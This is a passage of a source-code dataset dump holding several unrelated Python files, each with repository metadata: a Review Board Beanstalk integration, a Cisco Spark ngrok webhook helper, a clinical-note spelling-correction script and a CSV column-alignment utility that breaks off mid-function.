    if chosen is None:
        raise Exception('No OpenCL CPU or GPU device found!')
    return cl.Context([chosen])
| 46.40625 | 129 | 0.525253 |
2913e5e3997cf60678f210784ad76ac271fbea7d | 10,303 | py | Python | reviewboard/hostingsvcs/beanstalk.py | mnoorenberghe/reviewboard | b8ba9d662c250cb5ec704a50f619adbf3be8cbf0 | [
"MIT"
] | null | null | null | reviewboard/hostingsvcs/beanstalk.py | mnoorenberghe/reviewboard | b8ba9d662c250cb5ec704a50f619adbf3be8cbf0 | [
"MIT"
] | null | null | null | reviewboard/hostingsvcs/beanstalk.py | mnoorenberghe/reviewboard | b8ba9d662c250cb5ec704a50f619adbf3be8cbf0 | [
"MIT"
] | 1 | 2021-11-23T15:25:44.000Z | 2021-11-23T15:25:44.000Z | from __future__ import unicode_literals
import json
import logging
import os
from collections import defaultdict
from django import forms
from django.conf.urls import patterns, url
from django.http import HttpResponse
from django.utils import six
from django.utils.six.moves.urllib.error import HTTPError, URLError
from django.utils.six.moves.urllib.parse import quote
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.http import require_POST
from reviewboard.admin.server import get_server_url
from reviewboard.hostingsvcs.forms import HostingServiceForm
from reviewboard.hostingsvcs.hook_utils import (close_all_review_requests,
get_review_request_id)
from reviewboard.hostingsvcs.service import HostingService
from reviewboard.scmtools.crypto_utils import (decrypt_password,
encrypt_password)
from reviewboard.scmtools.errors import FileNotFoundError
class BeanstalkForm(HostingServiceForm):
beanstalk_account_domain = forms.CharField(
label=_('Beanstalk account domain'),
max_length=64,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('This is the <tt>domain</tt> part of '
'<tt>domain.beanstalkapp.com</tt>'))
beanstalk_repo_name = forms.CharField(
label=_('Repository name'),
max_length=64,
required=True,
widget=forms.TextInput(attrs={'size': '60'}))
class Beanstalk(HostingService):
    """Hosting service support for Beanstalk.

    Beanstalk is a source hosting service that supports Git and Subversion
    repositories. It's available at http://beanstalkapp.com/.
    """
    name = 'Beanstalk'
    needs_authorization = True
    supports_bug_trackers = False
    supports_repositories = True
    supported_scmtools = ['Git', 'Subversion']
    form = BeanstalkForm

    # URL templates filled from the BeanstalkForm fields.
    repository_fields = {
        'Git': {
            'path': 'git@%(beanstalk_account_domain)s'
                    '.beanstalkapp.com:/%(beanstalk_account_domain)s/'
                    '%(beanstalk_repo_name)s.git',
            'mirror_path': 'https://%(beanstalk_account_domain)s'
                           '.git.beanstalkapp.com/%(beanstalk_repo_name)s.git',
        },
        'Subversion': {
            'path': 'https://%(beanstalk_account_domain)s'
                    '.svn.beanstalkapp.com/%(beanstalk_repo_name)s/',
        },
    }
    repository_url_patterns = patterns(
        '',
        url(r'^hooks/post-receive/$',
            'reviewboard.hostingsvcs.beanstalk.process_post_receive_hook'),
    )

    def check_repository(self, beanstalk_account_domain=None,
                         beanstalk_repo_name=None, *args, **kwargs):
        """Checks the validity of a repository.

        This will perform an API request against Beanstalk to get
        information on the repository. This will throw an exception if
        the repository was not found, and return cleanly if it was found.
        """
        self._api_get_repository(beanstalk_account_domain, beanstalk_repo_name)

    def authorize(self, username, password, hosting_url,
                  local_site_name=None, *args, **kwargs):
        """Authorizes the Beanstalk repository.

        Beanstalk uses HTTP Basic Auth for the API, so this will store the
        provided password, encrypted, for use in later API requests.
        """
        # Note: only the password is stored; username comes from the account.
        self.account.data['password'] = encrypt_password(password)
        self.account.save()

    def is_authorized(self):
        """Determines if the account has supported authorization tokens.

        This just checks if there's a password set on the account.
        """
        return self.account.data.get('password', None) is not None

    def get_password(self):
        """Returns the password for this account.

        This is needed for API calls and for Subversion.
        """
        return decrypt_password(self.account.data['password'])

    def get_file(self, repository, path, revision, base_commit_id=None,
                 *args, **kwargs):
        """Fetches a file from Beanstalk.

        This will perform an API request to fetch the contents of a file.
        If using Git, this will expect a base commit ID to be provided.

        Raises FileNotFoundError if the API request fails.
        """
        try:
            return self._api_get_node(repository, path, revision,
                                      base_commit_id, contents=True)
        except (HTTPError, URLError):
            raise FileNotFoundError(path, revision)

    def get_file_exists(self, repository, path, revision, base_commit_id=None,
                        *args, **kwargs):
        """Determines if a file exists.

        This will perform an API request to fetch the metadata for a file.
        If using Git, this will expect a base commit ID to be provided.
        """
        try:
            self._api_get_node(repository, path, revision, base_commit_id)
            return True
        except (HTTPError, URLError, FileNotFoundError):
            return False

    def _api_get_repository(self, account_domain, repository_name):
        """Fetch a repository's JSON metadata from the Beanstalk API."""
        url = self._build_api_url(account_domain,
                                  'repositories/%s.json' % repository_name)
        return self._api_get(url)

    def _api_get_node(self, repository, path, revision, base_commit_id,
                      contents=False):
        """Fetch file metadata or contents for a path at a revision."""
        # Unless we're fetching raw content, we optimistically want to
        # grab the metadata for the file. That's going to be a lot smaller
        # than the file contents in most cases. However, we can only do that
        # with a base_commit_id. If we don't have that, we fall back on
        # fetching the full file contents.
        is_git = (repository.tool.name == 'Git')
        if is_git and (contents or not base_commit_id):
            url_path = ('blob?id=%s&name=%s'
                        % (quote(revision), quote(os.path.basename(path))))
            raw_content = True
        else:
            if is_git:
                expected_revision = base_commit_id
            else:
                expected_revision = revision
            url_path = ('node.json?path=%s&revision=%s'
                        % (quote(path), quote(expected_revision)))
            if contents:
                url_path += '&contents=1'
            raw_content = False
        url = self._build_api_url(
            self._get_repository_account_domain(repository),
            'repositories/%s/%s'
            % (repository.extra_data['beanstalk_repo_name'], url_path))
        result = self._api_get(url, raw_content=raw_content)
        if not raw_content and contents:
            result = result['contents']
        return result

    def _build_api_url(self, account_domain, url):
        """Build a full Beanstalk API URL for the given account and path."""
        return 'https://%s.beanstalkapp.com/api/%s' % (account_domain, url)

    def _get_repository_account_domain(self, repository):
        """Return the account domain stored with the repository."""
        return repository.extra_data['beanstalk_account_domain']

    def _api_get(self, url, raw_content=False):
        """Perform an authenticated GET; return raw bytes or parsed JSON.

        On an HTTP error, tries to surface Beanstalk's 'errors' list as the
        exception message; otherwise re-raises the HTTP error text.
        """
        try:
            data, headers = self.client.http_get(
                url,
                username=self.account.username,
                password=self.get_password())
            if raw_content:
                return data
            else:
                return json.loads(data)
        except HTTPError as e:
            data = e.read()
            try:
                rsp = json.loads(data)
            except ValueError:
                # json.loads raises ValueError on a non-JSON error body.
                # (Previously a bare ``except:`` here also swallowed
                # SystemExit/KeyboardInterrupt.)
                rsp = None
            if rsp and 'errors' in rsp:
                raise Exception('; '.join(rsp['errors']))
            else:
                raise Exception(six.text_type(e))
@require_POST
def process_post_receive_hook(request, *args, **kwargs):
    """Closes review requests as submitted automatically after a push.

    Beanstalk POSTs a 'payload' form field for Git pushes and a 'commit'
    field for Subversion commits; dispatch to the matching closer.
    Responds with HTTP 415 (Unsupported Media Type) when the expected
    field is missing or is not valid JSON.
    """
    try:
        server_url = get_server_url(request=request)
        # Check if it's a git or an SVN repository and close accordingly.
        if 'payload' in request.POST:
            payload = json.loads(request.POST['payload'])
            close_git_review_requests(payload, server_url)
        else:
            payload = json.loads(request.POST['commit'])
            close_svn_review_request(payload, server_url)
    except KeyError as e:
        # Neither 'payload' nor 'commit' was present in the POST data.
        logging.error('There is no JSON payload in the POST request.: %s', e)
        return HttpResponse(status=415)
    except ValueError as e:
        # json.loads failed; the hook body was not valid JSON.
        logging.error('The payload is not in JSON format: %s', e)
        return HttpResponse(status=415)
    return HttpResponse()
def close_git_review_requests(payload, server_url):
    """Close all review requests referenced by a git push payload.

    A git payload may carry several commits.  Each commit is mapped to a
    review request id via its commit message (falling back to the commit
    hash), and every matched review request is closed in a single pass.
    """
    commits_by_review_id = defaultdict(list)
    branch = payload.get('branch')
    if not branch:
        # No branch information: nothing to close.
        return commits_by_review_id
    for commit in payload.get('commits', []):
        sha = commit.get('id')
        message = commit.get('message')
        request_id = get_review_request_id(message, server_url, sha)
        commits_by_review_id[request_id].append('%s (%s)' % (branch, sha[:7]))
    close_all_review_requests(commits_by_review_id)
def close_svn_review_request(payload, server_url):
    """Closes the review request for an SVN repository.

    The SVN payload may contain one commit. If the commit message does not
    contain a review request ID, no review request is closed.
    """
    review_id_to_commits_map = defaultdict(list)
    commit_message = payload.get('message')
    branch_name = payload.get('changeset_url', 'SVN Repository')
    # Fix: the original "'%s %d' % ('Revision: ', ...)" produced a doubled
    # space ("Revision:  N") and raised TypeError for a missing/non-int
    # revision; %s handles both cleanly.
    revision = 'Revision: %s' % payload.get('revision')
    review_request_id = get_review_request_id(commit_message, server_url,
                                              None)
    commit_entry = '%s (%s)' % (branch_name, revision)
    review_id_to_commits_map[review_request_id].append(commit_entry)
    close_all_review_requests(review_id_to_commits_map)
| 36.40636 | 79 | 0.635543 |
54adafbe1bcc7918e0b858de5b810dc2c1ee2d0b | 56 | py | Python | haystack/modeling/evaluation/__init__.py | ArzelaAscoIi/haystack | be8f50c9e3de4e264b3f345f5f4b9c9ec518ed08 | [
"Apache-2.0"
] | 1 | 2022-03-06T02:13:15.000Z | 2022-03-06T02:13:15.000Z | haystack/modeling/evaluation/__init__.py | ArzelaAscoIi/haystack | be8f50c9e3de4e264b3f345f5f4b9c9ec518ed08 | [
"Apache-2.0"
] | null | null | null | haystack/modeling/evaluation/__init__.py | ArzelaAscoIi/haystack | be8f50c9e3de4e264b3f345f5f4b9c9ec518ed08 | [
"Apache-2.0"
] | 1 | 2022-03-23T18:17:02.000Z | 2022-03-23T18:17:02.000Z | from haystack.modeling.evaluation.eval import Evaluator
| 28 | 55 | 0.875 |
ecaaebfca9f5b032cc0bae3ebaf7362524992f49 | 3,276 | py | Python | examples/ngrokwebhook.py | UniversalSuperBox/ciscosparkapi | 86ddb6a31d6dd5550bba05919ab2bdf924e0a81a | [
"MIT"
] | 2 | 2016-09-30T08:35:05.000Z | 2016-09-30T13:52:49.000Z | examples/ngrokwebhook.py | fadante/ciscosparkapi | 86ddb6a31d6dd5550bba05919ab2bdf924e0a81a | [
"MIT"
] | 1 | 2021-06-01T21:52:12.000Z | 2021-06-01T21:52:12.000Z | ciscosparkapi/examples/ngrokwebhook.py | Futuramistic/Bot | e22672e9d627faf3d9393feb04d214cb62dec98d | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Sample script to read local ngrok info and create a corresponding webhook.
Sample script that reads ngrok info from the local ngrok client api and creates
a Cisco Spark Webhook pointint to the ngrok tunnel's public HTTP URL.
Typically ngrok is called run with the following syntax to redirect an
Internet accesible ngrok url to localhost port 8080:
$ ngrok http 8080
To use script simply launch ngrok, and then launch this script. After ngrok is
killed, run this script a second time to remove webhook from Cisco Spark.
"""
# Use future for Python v2 and v3 compatibility
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
from builtins import *
__author__ = "Brad Bester"
__author_email__ = "brbester@cisco.com"
__contributors__ = ["Chris Lunsford <chrlunsf@cisco.com>"]
__copyright__ = "Copyright (c) 2016-2018 Cisco and/or its affiliates."
__license__ = "MIT"
import sys
from ciscosparkapi import CiscoSparkAPI
import requests
# Find and import urljoin: stdlib location differs between Python 2 and 3.
if sys.version_info[0] < 3:
    from urlparse import urljoin
else:
    from urllib.parse import urljoin
# Constants
# Local ngrok client API (serves tunnel metadata on port 4040 by default).
NGROK_CLIENT_API_BASE_URL = "http://localhost:4040/api"
# Name/target/trigger used for the Cisco Spark webhook created below.
WEBHOOK_NAME = "ngrok_webhook"
WEBHOOK_URL_SUFFIX = "/sparkwebhook"
WEBHOOK_RESOURCE = "messages"
WEBHOOK_EVENT = "created"
def get_ngrok_public_url():
    """Get the ngrok public HTTP URL from the local client API.

    Returns the first tunnel whose public URL uses plain HTTP, or None
    when the ngrok client API cannot be reached or no such tunnel exists.
    """
    tunnels_endpoint = NGROK_CLIENT_API_BASE_URL + "/tunnels"
    try:
        response = requests.get(url=tunnels_endpoint,
                                headers={'content-type': 'application/json'})
        response.raise_for_status()
    except requests.exceptions.RequestException:
        print("Could not connect to the ngrok client API; "
              "assuming not running.")
        return None
    for tunnel in response.json()["tunnels"]:
        candidate = tunnel.get("public_url", "")
        if candidate.startswith("http://"):
            print("Found ngrok public HTTP URL:", candidate)
            return candidate
def delete_webhooks_with_name(spark_api, name):
    """Find a webhook by name."""
    matching = (wh for wh in spark_api.webhooks.list() if wh.name == name)
    for webhook in matching:
        print("Deleting Webhook:", webhook.name, webhook.targetUrl)
        spark_api.webhooks.delete(webhook.id)
def create_ngrok_webhook(spark_api, ngrok_public_url):
    """Create a Cisco Spark webhook pointing to the public ngrok URL."""
    print("Creating Webhook...")
    target = urljoin(ngrok_public_url, WEBHOOK_URL_SUFFIX)
    new_webhook = spark_api.webhooks.create(
        name=WEBHOOK_NAME,
        targetUrl=target,
        resource=WEBHOOK_RESOURCE,
        event=WEBHOOK_EVENT,
    )
    print(new_webhook)
    print("Webhook successfully created.")
    return new_webhook
def main():
    """Delete previous webhooks. If local ngrok tunnel, create a webhook."""
    api = CiscoSparkAPI()
    # Remove any stale webhook from a previous run before re-creating it.
    delete_webhooks_with_name(api, name=WEBHOOK_NAME)
    ngrok_url = get_ngrok_public_url()
    if ngrok_url is not None:
        create_ngrok_webhook(api, ngrok_url)


if __name__ == '__main__':
    main()
| 30.055046 | 80 | 0.677656 |
321d6c264d4289cc108340026665de3d2fed115e | 7,295 | py | Python | Code/3_wrongly_spelled_correctly_spelled_pair.py | kdpsingh/cornea-nlp | 8db0a2a4a9b4526d332efc096b94030b6158c9d1 | [
"MIT"
] | null | null | null | Code/3_wrongly_spelled_correctly_spelled_pair.py | kdpsingh/cornea-nlp | 8db0a2a4a9b4526d332efc096b94030b6158c9d1 | [
"MIT"
] | null | null | null | Code/3_wrongly_spelled_correctly_spelled_pair.py | kdpsingh/cornea-nlp | 8db0a2a4a9b4526d332efc096b94030b6158c9d1 | [
"MIT"
] | 1 | 2019-05-30T03:49:05.000Z | 2019-05-30T03:49:05.000Z | #!/usr/bin/env python
# coding: utf-8
import pandas as pd
import numpy as np
import string
from io import StringIO
import time
from functools import reduce
import itertools
import operator
import pyspark
from pyspark.sql.types import *
from pyspark.sql import *
from pyspark import SparkConf, SparkContext
from pyspark.sql.functions import col
import nltk
from nltk import RegexpTokenizer
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.corpus import stopwords as nltkstopwords
from nltk.corpus import wordnet
from nltk.stem.porter import *
from nltk import edit_distance
from autocorrect import spell
get_ipython().run_line_magic('matplotlib', 'inline')
# Download NLTK corpora needed below (stopwords list, WordNet lemmas).
nltk.download('stopwords')
nltk.download('wordnet')
## data read-in: load the encounter notes CSV, ignoring decode errors
inp_path = 'encounter_notes_12.csv'
dat=open(inp_path,errors='ignore',)
dat=dat.read()
test = StringIO(dat)
df = pd.read_csv(test, sep=",",na_values=" ")
# Column names of the left/right-eye slit-lamp exam fields and patient id.
left_eye ='SLE_L_CORNEA_1020'
right_eye ='SLE_R_CORNEA_1013'
patid = 'PAT_ID'
## combine left and right eye description into one free-text field
df['description'] = df[left_eye].map(str) +' '+ df[right_eye].map(str)
## set up the Spark environment for the word-count step
conf = SparkConf().setAppName("wd_count")
sc = SparkContext(conf=conf)
sqlCtx = SQLContext(sc)
ps_df=sqlCtx.createDataFrame(df[[patid,'description']])
## from pyspark df to rdd: lowercase, split on whitespace, strip punctuation,
## then count (patient, word) occurrences and sort
Rdd=ps_df.rdd
wd_ct=Rdd.map(lambda x: [x[0],x[1].lower().strip().split()]).flatMap(lambda x: [tuple([x[0], x[1][i].strip(string.punctuation)]) for i in range(0,len(x[1]))]).map(lambda x: (x, 1)).reduceByKey(lambda x, y: x + y).sortBy(lambda x: -x[0]).map(lambda x:[x[0][0],x[0][1],x[1]]).toDF()
## print col names
wd_ct.printSchema()
## rename cols
wd_ct = wd_ct.selectExpr("_1 as PAT_ID","_2 as word", "_3 as cts")
## aggregate words together across patients by summing frequency
words=wd_ct.groupBy("word").agg({"cts": "sum"}).sort(col("sum(cts)").desc())
## transform to pandas df
pd_words=words.toPandas().sort_values('word')
pd_words.sort_values('word').head(10)
#correction('wiht')
#start = timeit.timeit()
#newlist = list(map(correction, pd_words['word'].tolist()))
#end = timeit.timeit()
#print(end - start)
## tokenizing: keep only purely alphabetic tokens
tokenizer = RegexpTokenizer(r'[a-zA-Z]+')
tokens = tokenizer.tokenize(' '.join(pd_words['word'].tolist()))
pd_words=pd_words.loc[pd_words['word'].isin(tokens)]
## spelling correction via autocorrect (timed; can be slow on large vocab)
start = time.time()
corrected=list(map(spell, pd_words['word'].tolist()))
end = time.time()
print(end-start)
pd_words['corrected']=pd.Series(corrected,index=pd_words.index)
## remove English stopwords (filtering on the corrected spelling)
nonstopwords = [wd for wd in corrected if wd not in nltkstopwords.words('english')]
pd_words=pd_words.loc[pd_words['corrected'].isin(nonstopwords)]
## stemming with the Porter stemmer
stemmer = PorterStemmer()
words1 = [stemmer.stem(word) for word in pd_words['corrected'].tolist()]
pd_words['stemmer']=pd.Series(words1,index=pd_words.index)
#lmtzr = WordNetLemmatizer()
#words2 = [lmtzr.lemmatize(word) for word in pd_words['corrected'].tolist()]
#pd_words['lmtzr']=pd.Series(words2,index=pd_words.index)
#nonstopwords = [wd for wd in pd_words.word if wd not in nltkstopwords.words('english')]
#pd_words=pd_words.loc[pd_words['corrected'].isin(nonstopwords)]
## aggregate words with the same stem: join originals, sum counts
a=pd_words.groupby('stemmer')['word'].apply(lambda x: ', '.join(x)).to_frame()
b=pd_words.groupby('stemmer')['sum(cts)'].sum().to_frame()
combined= pd.concat([a, b], axis=1)
# Drop the stem literally named 'nan' (from stringified missing values).
combined=combined[combined.index.isin(['nan'])==False ]
combined=combined.reset_index()
def Prob(word, N=sum(pd_words['sum(cts)'])):
    """Probability of `word`, i.e. its corpus count divided by N.

    N defaults to the total word count, evaluated once at definition time.
    """
    return pd_words.loc[pd_words.word == word, 'sum(cts)'].values / N
def correction(lst_of_word):
    """Most probable spelling among the candidate words."""
    # max() keeps the first candidate on ties, matching corpus order.
    best = max(lst_of_word, key=Prob)
    return best
# For each stem group, pick the most frequent original spelling as the
# representative "corrected" form.
corrected=[]
for i in range (0, len(combined)):
    corrected.append(correction(combined.word.iloc[i].split(', ')))
combined['stemmed_corrected']=pd.Series(corrected, index=combined.index)
cols=['stemmer','stemmed_corrected','word', 'sum(cts)']
combined = combined[cols]
# Keep only stems of at least two characters.
newlist=combined.stemmer.tolist()
needed=list()
for i in newlist:
    if len(i)>=2:
        needed.append(i)
combined=combined[combined.stemmer.isin(needed)==True ]
def closed_wd(lst):
    '''Group close words using Levenshtein distance.

    Two words pair up when their edit distance is below one fifth of the
    longer word's length AND they share the same first two characters.
    Overlapping pairs are then merged into connected components, so the
    return value is a list of lists of mutually-similar words.
    '''
    # All unordered pairs of distinct words.
    pairs = [[lst[w1], lst[w2]] for w1 in range(len(lst)) for w2 in range(w1+1,len(lst))]
    closed_pairs=list()
    for i in pairs:
        # Length-relative threshold: tolerate ~1 edit per 5 characters.
        if edit_distance(i[0], i[1])<max(len(i[0])/5,len(i[1])/5):
            if i[0][:2]==i[1][:2]:
                i.sort()
                closed_pairs.append(i)
    # De-duplicate pairs (order-insensitive after the sort above).
    closed_pairs = [list(x) for x in set(tuple(x) for x in closed_pairs)]
    # Merge pairs sharing a word into one component: for each word, pull out
    # every group containing it and replace them with their union.
    LL = set(itertools.chain.from_iterable(closed_pairs))
    for each in LL:
        components = [x for x in closed_pairs if each in x]
        for i in components:
            closed_pairs.remove(i)
        closed_pairs += [list(set(itertools.chain.from_iterable(components)))]
    closed_pairs = [list(x) for x in set(tuple(x) for x in closed_pairs)]
    return closed_pairs
#closed_wd(combined.stemmed_corrected.tolist())
# Find clusters of similar corrected spellings; split the table into rows
# that belong to some cluster (sub) and rows that do not (combined).
newlist=combined.stemmed_corrected.tolist()
sim=closed_wd(newlist)
#newlist=combined.stemmer.tolist()
#simil_list3=closed_wd(newlist)
sub=combined[combined.stemmed_corrected.isin(reduce(operator.concat, sim))]
combined=combined[combined.stemmed_corrected.isin(reduce(operator.concat, sim))==False]
## assign same group id to similar words (index into sim)
groups=list(['na']*sub.shape[0])
for j in range(0,len(sub)):
    for i in range(0,len(sim)):
        if sub.stemmed_corrected.iloc[j] in sim[i]:
            groups[j]=i
sub['groups'] = pd.Series(groups, index=sub.index)
## aggregation: per cluster, join the stems/words/corrections, sum counts
a=sub.groupby('groups')['stemmer'].apply(lambda x: ', '.join(x)).to_frame()
b=sub.groupby('groups')['word'].apply(lambda x: ', '.join(x)).to_frame()
c=sub.groupby('groups')['sum(cts)'].sum().to_frame()
d=sub.groupby('groups')['stemmed_corrected'].apply(lambda x: ', '.join(x)).to_frame()
grouped_sub= pd.concat([a, b,c,d], axis=1)
## update the representative spelling per cluster by highest frequency
corrected=[]
for i in range (0, len(grouped_sub)):
    corrected.append(correction(grouped_sub.word.iloc[i].split(', ')))
grouped_sub['stemmed_corrected']= pd.Series(corrected, index=grouped_sub.index)
grouped_sub['stemmer']=pd.Series([stemmer.stem(word) for word in corrected], index=grouped_sub.index)
combined=combined.append(grouped_sub, ignore_index=True)
combined=combined[['stemmer','stemmed_corrected','word','sum(cts)']].sort_values('sum(cts)',ascending=False)
# NOTE(review): the next four lines assume 'epi' and 'defect' always appear
# in the vocabulary; .values[0] raises IndexError otherwise — TODO confirm.
epi_index=combined[combined.stemmed_corrected=='epi'].index.values[0]
combined.loc[epi_index,'sum(cts)']
defect_index=combined[combined.stemmed_corrected=='defect'].index.values[0]
combined.loc[defect_index,'sum(cts)']
# Fold the fused token 'epidefect' into both 'epi' and 'defect' counts.
if 'epidefect' in combined.stemmed_corrected.tolist():
    cts=combined[combined.stemmed_corrected=='epidefect']['sum(cts)'].values[0]
    epi_index=combined[combined.stemmed_corrected=='epi'].index.values[0]
    defect_index=combined[combined.stemmed_corrected=='defect'].index.values[0]
    combined = combined[combined.stemmed_corrected != 'epidefect']
    combined.loc[epi_index,'sum(cts)']=combined.loc[epi_index,'sum(cts)']+cts
    combined.loc[defect_index,'sum(cts)']=combined.loc[defect_index,'sum(cts)']+cts
combined.to_csv('df_allvisits_correction.csv', sep=',')
| 29.534413 | 280 | 0.715422 |
5d17c317b2eb800883ba2b9752d8090050015037 | 10,228 | py | Python | md_utils/align_on_col.py | cmayes/md_utils | c74cab20f46b0adb98bdc9d2a19b3d21ff9d7516 | [
"BSD-3-Clause"
] | 1 | 2020-07-01T01:05:35.000Z | 2020-07-01T01:05:35.000Z | md_utils/align_on_col.py | cmayes/md_utils | c74cab20f46b0adb98bdc9d2a19b3d21ff9d7516 | [
"BSD-3-Clause"
] | 1 | 2017-12-01T21:58:38.000Z | 2017-12-01T21:58:38.000Z | md_utils/align_on_col.py | cmayes/md_utils | c74cab20f46b0adb98bdc9d2a19b3d21ff9d7516 | [
"BSD-3-Clause"
] | 4 | 2017-02-26T19:17:08.000Z | 2020-04-07T09:43:22.000Z | #!/usr/bin/env python
"""
For combining data from multiple files based on a common timestep. All other data will be ignored or, if in logging
mode, printed to a log file.
"""
from __future__ import print_function
from collections import defaultdict
import argparse
import os
import six
import sys
from md_utils.md_common import (InvalidDataError, warning, read_csv_to_dict, write_csv, create_out_fname,
longest_common_substring, file_rows_to_list)
__author__ = 'hmayes'
# Error Codes (process exit statuses returned by main)
# The good status code
GOOD_RET = 0
INPUT_ERROR = 1
IO_ERROR = 2
INVALID_DATA = 3
# Constants #
# Defaults for the command-line options defined in parse_cmdline.
DEF_CMP_FILE = 'compare_list.txt'
DEF_DELIM = ','
DEF_ALIGN_COL_NAME = 'timestep'
DEF_OUT_FILE = 'comb.csv'
# Column name used to tag each output row with its source run.
RUN_NAME = 'run'
def parse_cmdline(argv):
    """
    Returns the parsed argument list and return code.

    `argv` is a list of arguments, or `None` for ``sys.argv[1:]``.
    :return: (namespace_or_None, status) where status is one of the module's
        error-code constants (GOOD_RET, IO_ERROR, INPUT_ERROR).
    """
    if argv is None:
        argv = sys.argv[1:]
    # initialize the parser object:
    parser = argparse.ArgumentParser(description='Make combine output from multiple files, with a common column '
                                                 'name, printing only data from common column values. ')
    parser.add_argument("-d", "--delimiter", help="The delimiter separating the file names in each row of the"
                                                  "compare_file_list. The default delimiter is '{}'.".format(DEF_DELIM),
                        default=DEF_DELIM)
    # Note: type=file_rows_to_list reads the file during argument parsing, so
    # IOError can be raised from parse_args itself (handled below).
    parser.add_argument("-f", "--compare_file_list", help="The location of the file that lists the files to be "
                                                          "combined. Each row should contain a list of files to be "
                                                          "combined by aligning on the col_name. "
                                                          "The default file name is {}, located in the "
                                                          "directory where the program as run.".format(DEF_CMP_FILE),
                        default=DEF_CMP_FILE, type=file_rows_to_list)
    parser.add_argument("-l", "--output_location", help="The location (directory) for output files. The default is the "
                                                        "directory from which the program was called.",
                        default=None)
    parser.add_argument("-n", "--col_name", help="The common column name in the files used as the key to combine "
                                                 "files. The default file name is {}.".format(DEF_ALIGN_COL_NAME),
                        default=DEF_ALIGN_COL_NAME)
    parser.add_argument("-o", "--out_name", help="The output file name. The default is {}.".format(DEF_OUT_FILE),
                        default=DEF_OUT_FILE)
    parser.add_argument("-s", "--sep_out", help="A flag to specify a separate output files should be created for "
                                                "the aligned files from each row of the compare_file_list. If this "
                                                "is specified, the out_name will be used as a suffix. The base name "
                                                "will be based on the common part of the names of the files to be "
                                                "combined. If there is no common string, the output files will be "
                                                "numbered based on their row number in the compare_file_list. Separate "
                                                "output files will also be created if the column names from files on "
                                                "different lines to not match.",
                        action='store_true')
    args = None
    try:
        args = parser.parse_args(argv)
    except IOError as e:
        warning("Problems reading file:", e)
        parser.print_help()
        return args, IO_ERROR
    except (KeyError, SystemExit) as e:
        # argparse raises SystemExit; exit code 0 means --help was requested.
        if hasattr(e, 'code') and e.code == 0:
            return args, GOOD_RET
        warning(e)
        parser.print_help()
        return args, INPUT_ERROR
    return args, GOOD_RET
def process_files(comp_f_list, col_name, base_out_name, delimiter, sep_out_flag, out_location):
    """
    Align the files listed on each row of comp_f_list on col_name and write
    the merged rows (only values of col_name common to all files on a row).

    @param comp_f_list: a list of lists of file names to process (file read during input processing)
    @param col_name: name of column to use for alignment
    @param base_out_name: name of file to be created, or suffix if multiple files to be created
    @param delimiter: string, delimiter separating file names on lines of the comp_f_list
    @param sep_out_flag: a boolean to note if separate output files should be made based on each row of input
    @param out_location: user-specified location for the output files, if specified
    @return: @raise InvalidDataError: when a listed file is missing or a row
        of files shares no value of col_name
    """
    # Maps each col_name value to the merged row assembled across files.
    all_dicts = defaultdict(dict)
    # if need multiple output files, designate them by adding a prefix
    prefix = ''
    # if there will be multiple output files, make sure do not reuse a prefix, so keep copy of used names
    prefix_used = []
    # if one output file from multiple sets of file to combine, will change write_mode to append later
    write_mode = 'w'
    # we don't have to specify run names in the output if there one row set of files to combine,
    # or if there will be separate output files
    if len(comp_f_list) < 2 or sep_out_flag:
        add_run_name = False
        headers = []
    else:
        add_run_name = True
        headers = [RUN_NAME]
    for line_num, line in enumerate(comp_f_list):
        dict_keys = None
        if sep_out_flag:
            # Each row gets a fresh merge and header list when separated.
            headers = []
            all_dicts = defaultdict(dict)
        # separate on delimiter, strip any white space, and also get rid of empty entries
        comp_files = list(filter(None, [c_file.strip() for c_file in line.split(delimiter)]))
        # get the common part of the name, if it exists; otherwise, give the name the line index
        # NOTE(review): if a row contains no file names, run_name is never
        # assigned and the test below raises NameError — TODO confirm inputs.
        for file_index, file_name in enumerate(comp_files):
            base_name = os.path.splitext(os.path.basename(file_name))[0]
            if file_index == 0:
                run_name = base_name
            else:
                run_name = longest_common_substring(run_name, base_name)
        if run_name == '':
            # because will use run_name as a string, need to convert it
            run_name = str(line_num) + "_"
        for c_file in comp_files:
            try:
                new_dict = read_csv_to_dict(c_file, col_name)
            except IOError:
                raise InvalidDataError("Did not find file: {}"
                                       "".format(c_file))
            # Keep only the alignment-column values seen in every file so far.
            if dict_keys is None:
                dict_keys = new_dict.keys()
            else:
                dict_keys = set(dict_keys).intersection(new_dict.keys())
            new_dict_keys = six.next(six.itervalues(new_dict)).keys()
            # Get the keys for the inner dictionary; diff methods for python 2 and 3 so use six
            # expect to only get new headers when making a new file (write_mode == 'w')
            # for the next file, will not gather more headers. When printed, extra cols will be skipped, and
            # missing columns will have no data shown
            if write_mode == 'w':
                for key in new_dict_keys:
                    if key in headers:
                        # okay if already have header if the header is the column.
                        # If we are going to append, we also expect to already have the header name
                        if key != col_name:
                            warning("Non-unique column name {} found in {}. "
                                    "Values will be overwritten.".format(key, c_file))
                    else:
                        headers.append(key)
            for new_key in new_dict.items():
                all_dicts[new_key[0]].update(new_key[1])
        final_dict = []
        for key in sorted(dict_keys):
            final_dict.append(all_dicts[key])
        # final_dict.append(all_dicts[key].update({RUN_NAME: run_name}))
        if add_run_name:
            for each_dict in final_dict:
                each_dict.update({RUN_NAME: run_name})
        # Possible to have no overlap in align column
        if len(final_dict) > 0:
            # make sure col_name appears first by taking it out before sorting
            if sep_out_flag:
                prefix = run_name
                if prefix == '' or prefix in prefix_used:
                    prefix = str(line_num) + "_"
            # have a consistent output by sorting the headers, but keep the aligning column first
            # only needs to be done for printing the first time
            if write_mode == 'w':
                headers.remove(col_name)
                headers = [col_name] + sorted(headers)
                if add_run_name:
                    headers.remove(RUN_NAME)
                    headers = [RUN_NAME] + headers
            f_name = create_out_fname(base_out_name, prefix=prefix, base_dir=out_location)
            prefix_used.append(prefix)
            write_csv(final_dict, f_name, headers, mode=write_mode)
            # After the first row, a single shared output file is appended to.
            if not sep_out_flag and write_mode == 'w':
                write_mode = 'a'
        else:
            raise InvalidDataError("No common values found for column {} among files: {}"
                                   "".format(col_name, ", ".join(comp_files)))
def main(argv=None):
    """Parse the command line, combine the listed files, return a status."""
    args, ret = parse_cmdline(argv)
    if ret != GOOD_RET or args is None:
        return ret
    try:
        process_files(args.compare_file_list, args.col_name, args.out_name,
